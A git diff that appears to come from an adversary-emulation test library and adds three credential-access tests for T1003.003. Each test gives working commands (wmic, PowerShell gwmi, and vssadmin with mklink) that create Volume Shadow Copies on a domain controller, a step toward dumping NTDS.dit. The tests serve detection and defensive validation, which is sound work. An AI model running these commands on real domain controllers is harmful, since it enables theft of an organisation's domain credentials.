diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index cebadf37..e4f467af 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -176,6 +176,9 @@ credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c6
 credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with NTDS.dit,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
 credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
+credential-access,T1003.003,NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt
+credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
+credential-access,T1003.003,NTDS,6,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
 credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
 credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
 credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 73cc639d..5d64bb8f 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -408,6 +408,9 @@ credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c6
 credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with NTDS.dit,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
 credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
+credential-access,T1003.003,NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt
+credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
+credential-access,T1003.003,NTDS,6,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
 credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
 credential-access,T1040,Network Sniffing,4,Packet Capture PowerShell,2bf62970-013a-4c74-b0a8-64030874e89a,powershell
 credential-access,T1003,OS Credential Dumping,1,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index f844b414..7a372883 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -390,6 +390,9 @@
   - Atomic Test #1: Create Volume Shadow Copy with NTDS.dit [windows]
   - Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy [windows]
   - Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows]
+  - Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
+  - Atomic Test #5: Create Volume Shadow Copy with Powershell [windows]
+  - Atomic Test #6: Create Symlink to Volume Shadow Copy [windows]
 - [T1040 Network Sniffing](../../T1040/T1040.md)
   - Atomic Test #1: Packet Capture Linux [linux]
   - Atomic Test #2: Packet Capture macOS [macos]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 6c42e8a4..233977fd 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -845,6 +845,9 @@
   - Atomic Test #1: Create Volume Shadow Copy with NTDS.dit [windows]
   - Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy [windows]
   - Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows]
+  - Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
+  - Atomic Test #5: Create Volume Shadow Copy with Powershell [windows]
+  - Atomic Test #6: Create Symlink to Volume Shadow Copy [windows]
 - [T1040 Network Sniffing](../../T1040/T1040.md)
   - Atomic Test #3: Packet Capture Windows Command Prompt [windows]
   - Atomic Test #4: Packet Capture PowerShell [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 2b744d57..3e0b7db6 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -18176,12 +18176,14 @@ credential-access:
         elevation_required: true
     - name: Copy NTDS.dit from Volume Shadow Copy
       auto_generated_guid: c6237146-9ea6-4711-85c9-c56d263a6b03
-      description: "This test is intended to be run on a domain Controller.\n\nThe
-        Active Directory database NTDS.dit may be dumped by copying it from a Volume
-        Shadow Copy.\n\nThis test requires steps taken in the test \"Create Volume
-        Shadow Copy with NTDS.dit\".\nA successful test also requires the export of
-        the SYSTEM Registry hive. \nThis test must be executed on a Windows Domain
-        Controller.\n"
+      description: |
+        This test is intended to be run on a domain Controller.
+
+        The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+
+        This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit".
+        A successful test also requires the export of the SYSTEM Registry hive.
+        This test must be executed on a Windows Domain Controller.
       supported_platforms:
       - windows
       input_arguments:
@@ -18249,6 +18251,71 @@ credential-access:
 '
         name: command_prompt
         elevation_required: true
+    - name: Create Volume Shadow Copy with WMI
+      auto_generated_guid: 224f7de0-8f0a-4a94-b5d8-989b036c86da
+      description: |
+        This test is intended to be run on a domain Controller.
+
+        The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+      supported_platforms:
+      - windows
+      input_arguments:
+        drive_letter:
+          description: Drive letter to source VSC (including colon)
+          type: String
+          default: 'C:'
+      dependencies:
+      - description: Target must be a Domain Controller
+        prereq_command: reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v
+          ProductType | findstr LanmanNT
+        get_prereq_command: echo Sorry, Promoting this machine to a Domain Controller
+          must be done manually
+      executor:
+        command: 'wmic shadowcopy call create Volume=#{drive_letter}
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Create Volume Shadow Copy with Powershell
+      auto_generated_guid: 542bb97e-da53-436b-8e43-e0a7d31a6c24
+      description: |
+        This test is intended to be run on a domain Controller.
+
+        The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+      supported_platforms:
+      - windows
+      input_arguments:
+        drive_letter:
+          description: Drive letter to source VSC (including colon)
+          type: String
+          default: 'C:'
+      executor:
+        command: "(gwmi -list win32_shadowcopy).Create(#{drive_letter},'ClientAccessible')\n"
+        name: powershell
+        elevation_required: true
+    - name: Create Symlink to Volume Shadow Copy
+      auto_generated_guid: 21748c28-2793-4284-9e07-d6d028b66702
+      description: |
+        This test is intended to be run on a domain Controller.
+
+        The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.
+      supported_platforms:
+      - windows
+      input_arguments:
+        drive_letter:
+          description: Drive letter to source VSC (including colon)
+          type: String
+          default: 'C:'
+        symlink_path:
+          description: symlink path
+          type: String
+          default: C:\Temp\vssstore
+      executor:
+        command: |
+          vssadmin.exe create shadow /for=#{drive_letter}
+          mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
+        name: command_prompt
+        elevation_required: true
   T1040:
     technique:
       id: attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529
diff --git a/atomics/T1003.003/T1003.003.md b/atomics/T1003.003/T1003.003.md
index 5fe7fcc8..b46716a0 100644
--- a/atomics/T1003.003/T1003.003.md
+++ b/atomics/T1003.003/T1003.003.md
@@ -20,6 +20,12 @@ The following tools and techniques can be used to enumerate the NTDS file and th
 
 - [Atomic Test #3 - Dump Active Directory Database with NTDSUtil](#atomic-test-3---dump-active-directory-database-with-ntdsutil)
 
+- [Atomic Test #4 - Create Volume Shadow Copy with WMI](#atomic-test-4---create-volume-shadow-copy-with-wmi)
+
+- [Atomic Test #5 - Create Volume Shadow Copy with Powershell](#atomic-test-5---create-volume-shadow-copy-with-powershell)
+
+- [Atomic Test #6 - Create Symlink to Volume Shadow Copy](#atomic-test-6---create-symlink-to-volume-shadow-copy)
+
 
 <br/>
 
@@ -72,7 +78,7 @@ This test is intended to be run on a domain Controller.
 The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
 
 This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit".
-A successful test also requires the export of the SYSTEM Registry hive. 
+A successful test also requires the export of the SYSTEM Registry hive.
 This test must be executed on a Windows Domain Controller.
 
 **Supported Platforms:** Windows
@@ -189,4 +195,111 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #4 - Create Volume Shadow Copy with WMI
+This test is intended to be run on a domain Controller.
+
+The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| drive_letter | Drive letter to source VSC (including colon) | String | C:|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+wmic shadowcopy call create Volume=#{drive_letter}
+```
+
+
+
+
+#### Dependencies:  Run with `command_prompt`!
+##### Description: Target must be a Domain Controller
+##### Check Prereq Commands:
+```cmd
+reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT 
+```
+##### Get Prereq Commands:
+```cmd
+echo Sorry, Promoting this machine to a Domain Controller must be done manually
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Create Volume Shadow Copy with Powershell
+This test is intended to be run on a domain Controller.
+
+The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| drive_letter | Drive letter to source VSC (including colon) | String | C:|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+(gwmi -list win32_shadowcopy).Create(#{drive_letter},'ClientAccessible')
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - Create Symlink to Volume Shadow Copy
+This test is intended to be run on a domain Controller.
+
+The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| drive_letter | Drive letter to source VSC (including colon) | String | C:|
+| symlink_path | symlink path | String | C:&#92;Temp&#92;vssstore|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+vssadmin.exe create shadow /for=#{drive_letter}
+mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
+```
+
+
+
+
+
+
 <br/>
diff --git a/atomics/T1003.003/T1003.003.yaml b/atomics/T1003.003/T1003.003.yaml
index 9718e758..6d7938e1 100644
--- a/atomics/T1003.003/T1003.003.yaml
+++ b/atomics/T1003.003/T1003.003.yaml
@@ -35,7 +35,7 @@ atomic_tests:
     The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
 
     This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit".
-    A successful test also requires the export of the SYSTEM Registry hive. 
+    A successful test also requires the export of the SYSTEM Registry hive.
     This test must be executed on a Windows Domain Controller.
   supported_platforms:
   - windows
@@ -111,3 +111,72 @@ atomic_tests:
       rmdir /q /s #{output_folder}
     name: command_prompt
     elevation_required: true
+
+- name: Create Volume Shadow Copy with WMI
+  auto_generated_guid: 224f7de0-8f0a-4a94-b5d8-989b036c86da
+  description: |
+    This test is intended to be run on a domain Controller.
+
+    The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+  supported_platforms:
+  - windows
+  input_arguments:
+    drive_letter:
+      description: Drive letter to source VSC (including colon)
+      type: String
+      default: 'C:'
+  dependencies:
+  - description: |
+      Target must be a Domain Controller
+    prereq_command: |
+      reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT
+    get_prereq_command: |
+      echo Sorry, Promoting this machine to a Domain Controller must be done manually
+  executor:
+    command: |
+      wmic shadowcopy call create Volume=#{drive_letter}
+    name: command_prompt
+    elevation_required: true
+
+- name: Create Volume Shadow Copy with Powershell
+  auto_generated_guid: 542bb97e-da53-436b-8e43-e0a7d31a6c24
+  description: |
+    This test is intended to be run on a domain Controller.
+
+    The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+  supported_platforms:
+  - windows
+  input_arguments:
+    drive_letter:
+      description: Drive letter to source VSC (including colon)
+      type: String
+      default: 'C:'
+  executor:
+    command: |
+      (gwmi -list win32_shadowcopy).Create(#{drive_letter},'ClientAccessible')
+    name: powershell
+    elevation_required: true
+
+- name: Create Symlink to Volume Shadow Copy
+  auto_generated_guid: 21748c28-2793-4284-9e07-d6d028b66702
+  description: |
+    This test is intended to be run on a domain Controller.
+
+    The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.
+  supported_platforms:
+  - windows
+  input_arguments:
+    drive_letter:
+      description: Drive letter to source VSC (including colon)
+      type: String
+      default: 'C:'
+    symlink_path:
+      description: symlink path
+      type: String
+      default: 'C:\Temp\vssstore'
+  executor:
+    command: |
+      vssadmin.exe create shadow /for=#{drive_letter}
+      mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
+    name: command_prompt
+    elevation_required: true